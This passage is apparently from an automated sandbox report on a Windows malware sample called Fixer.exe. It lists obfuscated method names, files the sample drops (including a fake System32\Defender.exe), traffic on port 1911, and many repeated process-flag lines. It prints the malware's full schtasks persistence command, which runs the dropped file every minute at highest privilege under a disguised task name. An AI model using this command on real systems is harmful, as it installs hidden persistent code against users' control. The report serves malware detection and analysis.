                  Source: Defender.exe.4.dr, JqoyJMwYkYeSSSLBCERtJfL.csHigh entropy of concatenated method names: '_003CRun_003Eb__1_0', 'eiLcBLWnxSzTbooKAH', 'jdfmOziWNDFxt', 'shTrcPinsNklrCmXVRYOlwywx', 'TpJjrUFVjGVTYscvlSC', 'IfkphnZeMviWtzvseI', 'PfVTfCCtglpKgtVV', 'FTBDubJoYyZZwjRdwmwmME', 'fustWkCcYdHnKGSUEMfHE', 'UkBYhkHYicAhWJCimD'
                  Source: Defender.exe.4.dr, huigHuEqBhxV.csHigh entropy of concatenated method names: 'xSzRXLdUGGB', 'ZKUsvmanhRBy', 'vZyEKNVIgqk', 'NjhhmbnhYi', 'jyFuXiXfRAOclfQwtfzt', 'jqhDsFvqNReNpOGE', 'yaILTBzHwBVeuCZ', 'PzHYqfccpDjjPvRJsagYlI', 'phwwEZLTPFYaOy', 'cTxgVQRQrAkMmUVADGj'
                  Source: Defender.exe.4.dr, sDxpENeYXPsYVcYDBrZBiKvaq.csHigh entropy of concatenated method names: 'lMRPIUZJwfRESTctpRH', 'OqlcEVUlOiIWzabSHIGXy', 'gslwZGZpUeTDP', 'apKnAnvOXvErrJmgKjnCKsrI', 'NMYNeCvKgrRyTXLQRVpshPPD', 'TjQNkhxCqmbWAssIhLSUir', 'clsXBPPywVaKT', 'xvJUwdkjuRcxjADxjFc', 'obsKwmboeAaiZdjPI', 'mObsrauEgP'
                  Source: Defender.exe.4.dr, WYdQIVjMOZZzFKSg.csHigh entropy of concatenated method names: 'xVmIWWPGmNsQwHeZFZzsKD', 'NuZjXgamrjtndQMzBOKVIqvS', 'vZAlToetaYNwnsa', 'aAhCTAJsZydAh', 'WzHRbHaBYuPtDryDNVjJi', 'NPyuPHLUKdMnCOpWQTkZbmn', 'xSuWkIRYEflrShrTp', 'jlhPokNqFQZ', 'ObbZxxNpjCMn', 'WcxEjbQkXCCrhdJIuCAz'
                  Source: Defender.exe.4.dr, fIEdZvXcpYAipTNh.csHigh entropy of concatenated method names: 'EgSyrpMyfurJMCyrIsjumlKCY', 'AfbyDBzvzsXWnTre', 'BgSdVCqgadnKTVPaVohXhqp', 'RCFUmFQCIrJVF', 'edkScYMkfXHwReKGLKrILSw', 'tVNkCcLuVcJDnPOR', 'hXiMpnlsBfzewhMgNYHLbiDLN', 'pUGTwwZKevOKEibsAw', 'PYvxWZqGGWyTW', 'OxRliiDElDQSDUZjjhHzxCuWk'
                  Source: Defender.exe.4.dr, ueHNMdjwjYBvgC.csHigh entropy of concatenated method names: 'KVvAMKuWDzYAKXvnmxTAjYSYH', 'HXDGRMJZqUXHDFzIEOodZY', 'lOxMCNlCXtXCXSwiLrkgaP', 'uOBbUEkdOjjSrTzGLFR', 'OfCbpHgcmo', 'NWjDyBlQynPJToAEOMkYbJO', 'OMZmMXIrasVwIQB', 'aoSMyWjnpCR', 'CPPDHSombzDbfX', 'bSDwyLeymqBSsclwKGsp'
                  Source: Defender.exe.4.dr, VgiXrAmmXM.csHigh entropy of concatenated method names: 'RlSpcTxUImVHRJThXP', 'UFtJFrybKqoQQdWbgICKPSM', 'PAZQNYTOWgsWXcMy', 'rneUWEdvinYVFcBsZtF', 'iOmWZtklADDvEfX', 'izsvvVekutRDrdyiHfw', 'BHvdTruejdQZEVJaBJW', 'jBcfbguXFVoYj', 'ebEPcDbAAQcrzVTXhxJjtzeP', 'mxWYOospJq'
                  Source: Defender.exe.4.dr, EiphzSFywDsQvfJ.csHigh entropy of concatenated method names: 'UguORtUtzui', 'dkKlBYhllU', 'PQlvpndBHrv', 'ulpsNbUzFBfoNQWBjyB', 'AZfxgyeGWsbIhFQA', 'fUKRUAOlwiYQb', 'IqbeUFrMPwNdNZW', 'HAWpDeqCfYQL', 'QGpuZSSGbwuUTFODrnoPp', 'YumPezZyvofczqYioH'

                  Persistence and Installation Behavior

                  barindex
                  Drops executables to the windows directory (C:\Windows) and starts them
                  Source: unknownExecutable created and started: C:\Windows\System32\Defender.exe
                  Source: C:\Users\user\AppData\Local\Temp\FixerNerest.exeFile created: C:\Windows\System32\Defender.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Fixer.exeFile created: C:\Users\user\AppData\Local\Temp\FixerNerest.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Fixer.exeFile created: C:\Users\user\AppData\Local\Temp\6z9uno0baqvej0me.exeJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\FixerNerest.exeFile created: C:\Windows\System32\Defender.exeJump to dropped file

                  Boot Survival

                  barindex
                  Uses schtasks.exe or at.exe to add and modify task schedules
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /create /f /sc minute /mo 1 /tn "Microsoft\WindowsAPI" /tr "C:\Windows\System32\Defender.exe" /RL HIGHEST

                  Hooking and other Techniques for Hiding and Protection

                  barindex
                  Uses known network protocols on non-standard ports
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 1911
                  Source: unknownNetwork traffic detected: HTTP traffic on port 1911 -> 49705
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 1911
                  Source: unknownNetwork traffic detected: HTTP traffic on port 1911 -> 49705
                  Source: C:\Users\user\Desktop\Fixer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Fixer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Fixer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Fixer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Fixer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Fixer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Fixer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Fixer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Fixer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Fixer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Fixer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Fixer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Fixer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Fixer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Fixer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Fixer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Fixer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Fixer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Fixer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Fixer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Fixer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Fixer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Fixer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Fixer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Fixer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Fixer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Fixer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Fixer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Fixer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Fixer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Fixer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Fixer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Fixer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Fixer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Fixer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Fixer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Fixer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Fixer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Fixer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Fixer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Fixer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Fixer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Fixer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Fixer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Fixer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Fixer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Fixer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Fixer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Fixer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Fixer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Fixer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Fixer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Fixer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Fixer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Fixer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Fixer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Fixer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Fixer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Fixer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Fixer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Fixer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Fixer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Fixer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Fixer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Fixer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Fixer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Fixer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Fixer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Fixer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Fixer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Fixer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Fixer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Fixer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Fixer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Fixer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Fixer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Fixer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Fixer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Fixer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Fixer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Fixer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Fixer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Fixer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Fixer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6z9uno0baqvej0me.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6z9uno0baqvej0me.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6z9uno0baqvej0me.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6z9uno0baqvej0me.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6z9uno0baqvej0me.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6z9uno0baqvej0me.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6z9uno0baqvej0me.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6z9uno0baqvej0me.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6z9uno0baqvej0me.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6z9uno0baqvej0me.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6z9uno0baqvej0me.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6z9uno0baqvej0me.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6z9uno0baqvej0me.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6z9uno0baqvej0me.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6z9uno0baqvej0me.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6z9uno0baqvej0me.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6z9uno0baqvej0me.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6z9uno0baqvej0me.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\FixerNerest.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\FixerNerest.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\FixerNerest.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\FixerNerest.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\FixerNerest.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\FixerNerest.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\FixerNerest.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\FixerNerest.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\FixerNerest.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\FixerNerest.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\FixerNerest.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\FixerNerest.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\FixerNerest.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\FixerNerest.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\FixerNerest.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\FixerNerest.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\FixerNerest.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\FixerNerest.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\FixerNerest.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\FixerNerest.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\FixerNerest.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\FixerNerest.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\FixerNerest.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\FixerNerest.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\FixerNerest.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\FixerNerest.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\FixerNerest.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\FixerNerest.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\FixerNerest.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\FixerNerest.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\FixerNerest.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\FixerNerest.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\FixerNerest.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\FixerNerest.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\FixerNerest.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\Defender.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\Defender.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\Defender.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\Defender.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\Defender.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\Defender.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\Defender.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\Defender.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\Defender.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\Defender.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\Defender.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\Defender.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\Defender.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\Defender.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\Defender.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\Defender.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\Defender.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\Defender.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\Defender.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\Defender.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\Defender.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\Defender.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\Defender.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\Defender.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\Defender.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\Defender.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\Defender.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\Defender.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\Defender.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\Defender.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\Defender.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\Defender.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\Defender.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\Defender.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\Defender.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\Defender.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\Defender.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\Defender.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\Defender.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\Defender.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\Defender.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\Defender.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\Defender.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
